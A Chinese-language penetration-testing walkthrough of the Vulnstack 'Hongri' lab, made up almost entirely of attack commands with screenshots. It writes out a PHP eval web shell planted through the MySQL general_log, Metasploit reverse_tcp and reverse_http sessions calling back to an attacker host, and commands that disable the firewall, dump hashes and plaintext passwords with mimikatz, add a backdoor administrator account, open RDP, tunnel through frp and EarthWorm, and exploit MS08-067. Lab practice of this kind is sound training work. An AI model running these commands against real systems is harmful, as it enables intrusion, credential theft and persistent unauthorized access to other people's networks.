红日靶机一
一、获取shell
![](https://upload-images.jianshu.io/upload_images/4664072-93b9c58a35a7c8a8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
show variables like '%general%'; #查看日志状态
![](https://upload-images.jianshu.io/upload_images/4664072-6173aab7ccd0f140.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
当开启general时,所执行的sql语句都会出现在stu1.log文件中。那么,如果修改generallogfile的值,那么所执行的sql语句就会对应生成对应的文件中,进而getshell。SET GLOBAL general_log='on'
![](https://upload-images.jianshu.io/upload_images/4664072-d0bc7a1969cb2e9c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
SHOW VARIABLES LIKE '%secure%'
![](https://upload-images.jianshu.io/upload_images/4664072-9b02f08eaa0ced98.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
SET GLOBAL general_log_file='C:/phpStudy/www/test1.php' 改变日志生成的地址
![](https://upload-images.jianshu.io/upload_images/4664072-c1588dc84477d436.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
写入一句话
SELECT'<?php eval($_POST["cmd"]);?>'
![](https://upload-images.jianshu.io/upload_images/4664072-1a0b653768a9351d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
cs上线
![](https://upload-images.jianshu.io/upload_images/4664072-09169dd71a3befe5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ef02941681668b91.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
shell ipconfig
![](https://upload-images.jianshu.io/upload_images/4664072-60af0302d4bf7dfe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-64edea5ca78abb93.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
shell systeminfo
![](https://upload-images.jianshu.io/upload_images/4664072-3835ed1070196c95.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.44.129
lhost => 192.168.44.129
msf exploit(handler) > set lport 2222
lport =>2222msf exploit(handler) > exploit
![](https://upload-images.jianshu.io/upload_images/4664072-8b4ccf862ffe004d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-bca1355b41f115d7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
getsystem提权成功
![](https://upload-images.jianshu.io/upload_images/4664072-6bbb71a52d22d85b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
迁移进程
![](https://upload-images.jianshu.io/upload_images/4664072-d895178f93a57aaa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-39bbedc7066451f7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
关闭防火墙
netsh firewall set opmode disable
![](https://upload-images.jianshu.io/upload_images/4664072-eb850a2cb587bad3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
获取密码
run hashdump
![](https://upload-images.jianshu.io/upload_images/4664072-3ea228252f05df3d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
load mimikatz
![](https://upload-images.jianshu.io/upload_images/4664072-228f01a83b60a590.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
wdigest
![](https://upload-images.jianshu.io/upload_images/4664072-4ae1cf09ef14781e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
直接cs
![](https://upload-images.jianshu.io/upload_images/4664072-2b8e84c8ebe8d225.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-42a8b1c063664283.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
netsh advfirewall set allprofiles state off
关墙
进行远程登录
开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
![](https://upload-images.jianshu.io/upload_images/4664072-faadf48a3349652a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
添加管理员账号
net user username password /add
net localgroup administrators username /add
net user bienao 123.com /add
net localgroup administrators bienao /add
![](https://upload-images.jianshu.io/upload_images/4664072-d8486030bdc8b642.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
65001 UTF-8代码页 解决乱码
chcp 65001
![](https://upload-images.jianshu.io/upload_images/4664072-17b7f00c5d1e6999.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
远程连接
rdesktop 192.168.44.128:3389
![](https://upload-images.jianshu.io/upload_images/4664072-eb7a8f3d8fa993d8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-61a683b4c05dc36c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
探测域内存活主机
run windows/gather/enum_ad_computers
添加路由
run autoroute -s 192.168.52.0/24
run autoroute -p
![](https://upload-images.jianshu.io/upload_images/4664072-43a864a1192a6f08.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-11202676934d9646.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d86b445f60c6e0e8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
判断域控
shell net view /domain
shell net time /domain
![](https://upload-images.jianshu.io/upload_images/4664072-1e55d8b4de68b4ca.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
执行探测
for /L %i IN (1,1,254) DO ping -w 2 -n 1 192.168.52.%i
![](https://upload-images.jianshu.io/upload_images/4664072-c2b876447e15c2f3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
arp -a 主机探测
![](https://upload-images.jianshu.io/upload_images/4664072-69b1cd7f046a05eb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
nmap --script=vuln 192.168.52.141
![](https://upload-images.jianshu.io/upload_images/4664072-29896b933474fefb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
nmap --script=vuln 192.168.52.138
修改frps.ini文件
vim frps.ini
![](https://upload-images.jianshu.io/upload_images/4664072-fd6ad65b30c4d325.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
启动frp
./frps -c frps.ini
![](https://upload-images.jianshu.io/upload_images/4664072-59759ef10dac7686.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-58adf9fd11f10dfc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
frpc.exe -c frpc.ini
![](https://upload-images.jianshu.io/upload_images/4664072-7e77b84f5d608284.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
或者(ip不一样)
Kali: ./ew_for_linux64 -s rcsocks -l 1080 -e 1024
这条命令的意思是说让公网服务器监听1080和1024端口,等待攻击者机器访问1080端口,目标机器访问1024端口
windows: .\ew_for_Win.exe -s rssocks -d 192.168.255.132 -e 1024
![](https://upload-images.jianshu.io/upload_images/4664072-9613b25669a5baac.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-debd4aa278762466.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
proxychains代理
vi /etc/proxychains.conf
![](https://upload-images.jianshu.io/upload_images/4664072-f93ff1dd298fb088.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 exploit(multi/handler) > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.52.141
rhosts => 192.168.52.141
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > run
![](https://upload-images.jianshu.io/upload_images/4664072-e003736fdef8f608.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
net user bienao 123.com /add
net localgroup administrators bienao /add
netsh advfirewall set allprofiles state off 关墙
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 开3389
![](https://upload-images.jianshu.io/upload_images/4664072-365a3abf21dfb83a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
远程连接
rdesktop 192.168.44.141:3389
远程失败
getuid
run hashdump
![](https://upload-images.jianshu.io/upload_images/4664072-bf5c8d18995019c5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
wdigest #获取系统账户信息
load mimikatz #加载mimikatz
kerberos #获取明文
![](https://upload-images.jianshu.io/upload_images/4664072-443461888fbce4ac.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
域控弹回CS
meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(windows/smb/ms08_067_netapi) > use exploit/multi/handler
msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject
msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf5 exploit(windows/local/payload_inject) > set lhost 192.168.44.129
lhost => 192.168.44.129
msf5 exploit(windows/local/payload_inject) > set lport 1111
lport => 1111
msf5 exploit(windows/local/payload_inject) > set session 2
session => 2
msf5 exploit(windows/local/payload_inject) > set disablepayloadhandler true
disablepayloadhandler => true
msf5 exploit(windows/local/payload_inject) > run
![](https://upload-images.jianshu.io/upload_images/4664072-df0a21a44847c34a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
参考学习
https://blog.csdn.net/qq_42349134/article/details/103135062
https://www.cooyf.com/bj/vulnstack1.html#0x04%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F